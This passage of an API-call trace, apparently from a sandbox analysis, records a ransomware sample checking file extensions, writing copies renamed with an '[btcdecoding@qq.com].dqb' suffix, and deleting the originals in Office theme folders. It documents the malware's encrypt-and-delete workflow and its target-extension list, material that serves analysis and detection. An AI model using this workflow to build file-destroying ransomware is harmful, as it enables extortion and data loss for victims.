returned 4 [0044.480] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0044.480] lstrlenW (lpString=".bz2") returned 4 [0044.480] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0044.480] lstrlenW (lpString=".7z") returned 3 [0044.480] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0044.480] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\THMBNAIL.PNG") returned 75 [0044.480] lstrlenW (lpString=".dbf") returned 4 [0044.480] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0044.480] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\THMBNAIL.PNG") returned 75 [0044.480] lstrlenW (lpString=".1cd") returned 4 [0044.480] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0044.480] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\THMBNAIL.PNG") returned 75 [0044.480] lstrlenW (lpString=".jpg") returned 4 [0044.480] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0044.480] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0044.481] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0044.481] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\PREVIEW.GIF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\refined\\preview.gif.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0044.485] GetLastError () returned 0x0 [0044.485] ReadFile (in: hFile=0x17c, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x58f, lpOverlapped=0x0) returned 1 [0044.487] WriteFile (in: hFile=0x210, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0x590, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0x590, lpOverlapped=0x0) returned 1 [0044.488] ReadFile (in: hFile=0x17c, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x0, lpOverlapped=0x0) returned 1 [0044.488] WriteFile (in: hFile=0x210, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0xea, lpOverlapped=0x0) returned 1 [0044.488] SetEndOfFile (hFile=0x210) returned 1 [0044.488] CloseHandle (hObject=0x210) returned 1 [0044.488] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0044.488] SetEndOfFile (hFile=0x17c) returned 1 [0044.489] CloseHandle (hObject=0x17c) returned 1 [0044.489] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\PREVIEW.GIF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0044.489] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\refined\\preview.gif")) returned 1 [0044.489] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\PREVIEW.GIF") returned 75 [0044.489] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\PREVIEW.GIF") returned 75 [0044.489] lstrlenW (lpString=".doc") returned 4 [0044.489] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0044.489] lstrlenW (lpString=".docx") returned 5 [0044.489] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0044.489] lstrlenW (lpString=".pdf") returned 4 [0044.489] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0044.489] lstrlenW (lpString=".xls") returned 4 [0044.489] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0044.489] lstrlenW (lpString=".xlsx") returned 5 [0044.490] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0044.490] lstrlenW (lpString=".ppt") returned 4 [0044.490] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0044.490] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\PREVIEW.GIF") returned 75 [0044.490] lstrlenW (lpString=".zip") returned 4 [0044.490] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0044.490] lstrlenW (lpString=".rar") returned 4 [0044.490] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0044.490] lstrlenW (lpString=".bz2") returned 4 [0044.490] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0044.490] lstrlenW (lpString=".7z") returned 3 [0044.490] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0044.490] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\PREVIEW.GIF") returned 75 [0044.490] lstrlenW (lpString=".dbf") returned 4 [0044.490] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0044.490] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\PREVIEW.GIF") returned 75 [0044.490] lstrlenW (lpString=".1cd") returned 4 [0044.490] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0044.490] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\PREVIEW.GIF") returned 75 [0044.490] lstrlenW (lpString=".jpg") returned 4 [0044.490] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0044.490] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x227ff1c | out: lpFileSize=0x227ff1c*=15737) returned 1 [0044.490] CloseHandle (hObject=0x17c) returned 1 [0044.490] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\refined\\thmbnail.png")) returned 0x20 [0044.491] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\THMBNAIL.PNG.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\refined\\thmbnail.png.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0044.491] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\refined\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0044.491] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0044.491] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0044.491] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\THMBNAIL.PNG.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\refined\\thmbnail.png.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0044.491] GetLastError () returned 0x0 [0044.491] ReadFile (in: hFile=0x17c, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x3d79, lpOverlapped=0x0) returned 1 [0044.493] WriteFile (in: hFile=0x210, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0x3d80, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0x3d80, lpOverlapped=0x0) returned 1 [0044.494] ReadFile (in: hFile=0x17c, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x0, lpOverlapped=0x0) returned 1 [0044.494] WriteFile (in: hFile=0x210, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0xec, lpOverlapped=0x0) returned 1 [0044.494] SetEndOfFile (hFile=0x210) returned 1 [0044.494] CloseHandle (hObject=0x210) returned 1 [0044.494] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0044.494] SetEndOfFile (hFile=0x17c) returned 1 [0044.495] CloseHandle (hObject=0x17c) returned 1 [0044.495] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\THMBNAIL.PNG.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0044.495] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\refined\\thmbnail.png")) returned 1 [0044.495] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\THMBNAIL.PNG") returned 76 [0044.495] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\THMBNAIL.PNG") returned 76 [0044.495] lstrlenW (lpString=".doc") returned 4 [0044.495] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0044.495] lstrlenW (lpString=".docx") returned 5 [0044.495] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0044.496] lstrlenW (lpString=".pdf") returned 4 [0044.496] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0044.496] lstrlenW (lpString=".xls") returned 4 [0044.496] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0044.496] lstrlenW (lpString=".xlsx") returned 5 [0044.496] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0044.496] lstrlenW (lpString=".ppt") returned 4 [0044.496] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0044.496] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\THMBNAIL.PNG") returned 76 [0044.496] lstrlenW (lpString=".zip") returned 4 [0044.496] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0044.496] lstrlenW (lpString=".rar") returned 4 [0044.496] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0044.496] lstrlenW (lpString=".bz2") returned 4 [0044.496] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0044.496] lstrlenW (lpString=".7z") returned 3 [0044.496] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0044.496] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\THMBNAIL.PNG") returned 76 [0044.496] lstrlenW (lpString=".dbf") returned 4 [0044.496] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0044.496] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\THMBNAIL.PNG") returned 76 [0044.496] lstrlenW (lpString=".1cd") returned 4 [0044.496] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0044.496] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\THMBNAIL.PNG") returned 76 [0044.496] lstrlenW (lpString=".jpg") returned 4 [0044.496] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0044.499] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0044.499] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0044.500] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\PREVIEW.GIF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ricepapr\\preview.gif.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0044.501] GetLastError () returned 0x0 [0044.501] ReadFile (in: hFile=0x17c, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0xf82, lpOverlapped=0x0) returned 1 [0044.503] WriteFile (in: hFile=0x210, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0xf90, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0xf90, lpOverlapped=0x0) returned 1 [0044.504] ReadFile (in: hFile=0x17c, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x0, lpOverlapped=0x0) returned 1 [0044.504] WriteFile (in: hFile=0x210, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0xea, lpOverlapped=0x0) returned 1 [0044.504] SetEndOfFile (hFile=0x210) returned 1 [0044.504] CloseHandle (hObject=0x210) returned 1 [0044.504] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0044.504] SetEndOfFile (hFile=0x17c) returned 1 [0044.505] CloseHandle (hObject=0x17c) returned 1 [0044.505] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\PREVIEW.GIF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0044.505] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ricepapr\\preview.gif")) returned 1 [0044.506] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\PREVIEW.GIF") returned 76 [0044.506] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\PREVIEW.GIF") returned 76 [0044.506] lstrlenW (lpString=".doc") returned 4 [0044.506] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0044.506] lstrlenW (lpString=".docx") returned 5 [0044.506] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0044.506] lstrlenW (lpString=".pdf") returned 4 [0044.506] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0044.506] lstrlenW (lpString=".xls") returned 4 [0044.506] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0044.506] lstrlenW (lpString=".xlsx") returned 5 [0044.506] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0044.506] lstrlenW (lpString=".ppt") returned 4 [0044.506] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0044.506] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\PREVIEW.GIF") returned 76 [0044.506] lstrlenW (lpString=".zip") returned 4 [0044.506] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0044.506] lstrlenW (lpString=".rar") returned 4 [0044.506] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0044.506] lstrlenW (lpString=".bz2") returned 4 [0044.506] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0044.506] lstrlenW (lpString=".7z") returned 3 [0044.506] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0044.506] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\PREVIEW.GIF") returned 76 [0044.506] lstrlenW (lpString=".dbf") returned 4 [0044.506] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0044.506] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\PREVIEW.GIF") returned 76 [0044.506] lstrlenW (lpString=".1cd") returned 4 [0044.506] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0044.506] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\PREVIEW.GIF") returned 76 [0044.506] lstrlenW (lpString=".jpg") returned 4 [0044.507] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0044.507] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x227ff1c | out: lpFileSize=0x227ff1c*=53115) returned 1 [0044.507] CloseHandle (hObject=0x17c) returned 1 [0044.507] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ricepapr\\thmbnail.png")) returned 0x20 [0044.507] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\THMBNAIL.PNG.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ricepapr\\thmbnail.png.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0044.507] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ricepapr\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0044.507] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0044.507] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0044.507] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\THMBNAIL.PNG.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ricepapr\\thmbnail.png.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0044.508] GetLastError () returned 0x0 [0044.508] ReadFile (in: hFile=0x17c, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0xcf7b, lpOverlapped=0x0) returned 1 [0044.510] WriteFile (in: hFile=0x210, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0xcf80, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0xcf80, lpOverlapped=0x0) returned 1 [0044.512] ReadFile (in: hFile=0x17c, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x0, lpOverlapped=0x0) returned 1 [0044.512] WriteFile (in: hFile=0x210, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0xec, lpOverlapped=0x0) returned 1 [0044.512] SetEndOfFile (hFile=0x210) returned 1 [0044.512] CloseHandle (hObject=0x210) returned 1 [0044.512] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0044.512] SetEndOfFile (hFile=0x17c) returned 1 [0044.513] CloseHandle (hObject=0x17c) returned 1 [0044.513] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\THMBNAIL.PNG.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0044.514] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ricepapr\\thmbnail.png")) returned 1 [0044.514] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\THMBNAIL.PNG") returned 77 [0044.514] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\THMBNAIL.PNG") returned 77 [0044.514] lstrlenW (lpString=".doc") returned 4 [0044.514] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0044.514] lstrlenW (lpString=".docx") returned 5 [0044.514] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0044.514] lstrlenW (lpString=".pdf") returned 4 [0044.514] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0044.514] lstrlenW (lpString=".xls") returned 4 [0044.514] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0044.514] lstrlenW (lpString=".xlsx") returned 5 [0044.514] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0044.514] lstrlenW (lpString=".ppt") returned 4 [0044.514] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0044.514] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\THMBNAIL.PNG") returned 77 [0044.514] lstrlenW (lpString=".zip") returned 4 [0044.514] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0044.514] lstrlenW (lpString=".rar") returned 4 [0044.515] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0044.515] lstrlenW (lpString=".bz2") returned 4 [0044.515] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0044.515] lstrlenW (lpString=".7z") returned 3 [0044.515] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0044.515] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\THMBNAIL.PNG") returned 77 [0044.515] lstrlenW (lpString=".dbf") returned 4 [0044.515] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0044.515] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\THMBNAIL.PNG") returned 77 [0044.515] lstrlenW (lpString=".1cd") returned 4 [0044.515] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0044.515] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\THMBNAIL.PNG") returned 77 [0044.515] lstrlenW (lpString=".jpg") returned 4 [0044.515] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0044.515] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0044.515] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0044.515] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\PREVIEW.GIF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ripple\\preview.gif.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0044.517] GetLastError () returned 0x0 [0044.517] ReadFile (in: hFile=0x17c, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0xa2c, lpOverlapped=0x0) returned 1 [0044.546] WriteFile (in: hFile=0x210, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0xa30, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0xa30, lpOverlapped=0x0) returned 1 [0044.547] ReadFile (in: hFile=0x17c, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x0, lpOverlapped=0x0) returned 1 [0044.547] WriteFile (in: hFile=0x210, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0xea, lpOverlapped=0x0) returned 1 [0044.547] SetEndOfFile (hFile=0x210) returned 1 [0044.547] CloseHandle (hObject=0x210) returned 1 [0044.547] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0044.547] SetEndOfFile (hFile=0x17c) returned 1 [0044.548] CloseHandle (hObject=0x17c) returned 1 [0044.548] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\PREVIEW.GIF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0044.548] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ripple\\preview.gif")) returned 1 [0044.548] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\PREVIEW.GIF") returned 74 [0044.548] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\PREVIEW.GIF") returned 74 [0044.548] lstrlenW (lpString=".doc") returned 4 [0044.548] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0044.548] lstrlenW (lpString=".docx") returned 5 [0044.548] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0044.548] lstrlenW (lpString=".pdf") returned 4 [0044.548] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0044.548] lstrlenW (lpString=".xls") returned 4 [0044.548] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0044.548] lstrlenW (lpString=".xlsx") returned 5 [0044.548] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 